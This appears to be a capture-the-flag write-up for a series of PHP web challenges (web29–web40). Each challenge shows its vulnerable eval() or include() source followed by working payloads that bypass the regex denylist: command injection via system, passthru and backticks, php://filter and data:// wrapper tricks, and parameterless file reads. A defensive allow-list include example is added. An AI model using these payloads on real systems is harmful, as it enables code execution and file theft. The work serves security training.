A winding road always has its reasons; I only hope the last page is flowers blooming for miles.
web29
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The filter blocks the string flag, case-insensitively:
preg_match("/flag/i", $c)
?c=system("ls");
The listing shows the flag file.
So we only need to avoid the literal string flag.
?c=system("cat f*");
?c=system("cat fla''g.php");
?c=system("cat fla?.php");
?c=system("nl fla?.php");
?c=system("tac fla?.php");
?c=passthru("cat%20f*");
Alternatives:
payload1:c=system("nl fla?????");
payload2:c=system("nl fla*");
payload3:c=echo `nl fl''ag.php`; or c=echo `nl fl""ag.php`; or c=system('nl fl""ag.php');
payload4:c=echo `nl fl\ag.php`; // bypass via an escape character
payload5:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload6:c=eval($_GET[1]);&1=system('nl flag.php'); or c=include($_GET[1]);&1=system("cat flag.php")
payload7:c=`cp f???.??? 123.txt`; // then read 123.txt
web30
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php.
All of the following functions have the same effect:
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Backticks (``) are equivalent to shell_exec().
Still usable:
payload:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload:c=`cp f???.??? 123.txt`; // then read 123.txt
payload:c=echo `nl f*`; or c=echo `cat f*`; or c=echo `tac f*`;
payload:c=passthru("cat%20f*");
payload:c=passthru("cat%20fl''ag.ph''p");
payload:c=passthru("cat%20fl\ag.ph\p");
web31
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The challenge filters flag, system, php, cat, sort, shell, the dot, the space and the single quote.
Analysis: cat can be replaced by tac or nl, the space by %09 (a tab), and system by passthru.
payload:c=passthru("tac%09f*");
Alternatives:
payload:c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
payload:c=echo%09`nl%09f*`; or c=echo%09`tac%09f*`;
payload:c=eval($_GET[1]);&1=system('nl flag.php');
web32
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php, cat, sort, shell, the dot, the space, the single quote, the backtick, echo, the semicolon and the opening parenthesis.
Analysis: that is a lot of filtering... Start from ?c=include$_GET["1"];&1=s.base64-encode/resource=flag.php
Only the ; needs to be replaced with ?> (the closing tag also terminates the statement).
payload:?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web33
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php, cat, sort, shell, the dot, the space, the single quote, the backtick, echo, the semicolon, the opening parenthesis and the double quote.
Analysis: compared with the previous challenge, the double quote is filtered as well; the previous payload c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php can still be adapted.
If the key inside [] is a single character, the "" can be dropped.
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web34
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php, cat, sort, shell, the dot, the space, the single quote, the backtick, echo, the semicolon, the opening parenthesis, the colon and the double quote.
Only the colon was added, so the previous payload still works.
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web35
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php, cat, sort, shell, the dot, the space, the single quote, the backtick, echo, the semicolon, the opening parenthesis, the colon, the double quote, < and the equals sign.
Only < and the equals sign were added; the previous payload still works.
payload:c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
web36
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, system, php, cat, sort, shell, the dot, the space, the single quote, the backtick, echo, the semicolon, the opening parenthesis, the colon, the double quote, <, the equals sign, / and the digits 0-9.
Added: / and the digits 0-9. Still based on the previous payload: c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
Just replace 1 with a.
payload:c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
In this code $c is wrapped in include(), so a PHP stream wrapper is needed; the data:// wrapper can be used here.
data://
Like php://input, it lets the user control the input stream. When combined with an include function, the user-supplied data:// stream is executed as a PHP file, leading to arbitrary code execution.
payload1:c=data://text/plain,<?php%20system("cat%20f*");?>
payload2:c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== // base64; decodes to <?php system('cat flag.php');?>
web38
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
Filtered: flag, php, file.
The previous payload still works:
payload:c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== // base64; decodes to <?php system('cat flag.php');?>
web39
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}
In this challenge the input c is forcibly suffixed with .php,
but the <?php ... ?> inside the data stream is already closed, so the trailing .php only becomes part of the stream content and has no effect.
The payload from web37 still works:
payload:c=data://text/plain,<?php%20system("cat%20f*");?>
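The include() challenges above (web32-36 through php://filter, web37-39 through data://) all come from handing user input to include() and trying to denylist strings. The following is an added example, not part of the writeup or the challenge source: a hardened replacement that allow-lists a directory instead; the pages/ directory, the SafeIncludeError class and resolve_include() are assumptions of this example.

```php
<?php
// Added example: allow-list replacement for include($_GET['c']).
// Instead of blocking strings such as "flag" or "php", it only ever
// includes an existing, regular .php file inside one fixed directory.
declare(strict_types=1);

final class SafeIncludeError extends RuntimeException {}

/**
 * Resolve $name against $baseDir and return the real path if, and only
 * if, it is a regular .php file inside $baseDir. Throws otherwise.
 */
function resolve_include(string $name, string $baseDir): string
{
    // Stream wrappers (php://, data://, file://, ...), path separators and
    // NUL bytes are never legitimate in a page name, so reject them first.
    if ($name === '' || strpos($name, "\0") !== false
        || preg_match('~[/\\\\]|^[a-z][a-z0-9+.-]*:~i', $name)) {
        throw new SafeIncludeError('wrapper or path separator in page name');
    }
    $base = realpath($baseDir);
    if ($base === false) {
        throw new SafeIncludeError('allow-listed directory does not exist');
    }
    // realpath() returns false for wrappers and for missing files, and it
    // collapses any "..", so a prefix check against $base is sound.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    if ($real === false || !is_file($real)
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new SafeIncludeError('page is outside the allow-listed directory');
    }
    return $real;
}

// Usage (hypothetical pages/ directory): only files under it can be included.
$page = $_GET['c'] ?? 'home';
try {
    include resolve_include($page, __DIR__ . '/pages');
} catch (SafeIncludeError $e) {
    http_response_code(404);
    echo 'no such page';
}
```

Configuration alone does not close these challenges: allow_url_include=Off (PHP's default) blocks the data:// payloads, but php://filter reads local files regardless of that setting, so the include target itself has to be constrained as above.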
web40
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The challenge filters all kinds of symbols, but the regex filters the fullwidth (Chinese) parentheses, not the ASCII ones.
So we can use parameterless file reading; see the FreeBuf article 无参数读文件和RCE总结 (a summary of parameterless file reads and RCE).
构造payload:c=show_source(next(array_reverse(scandir(getcwd()))));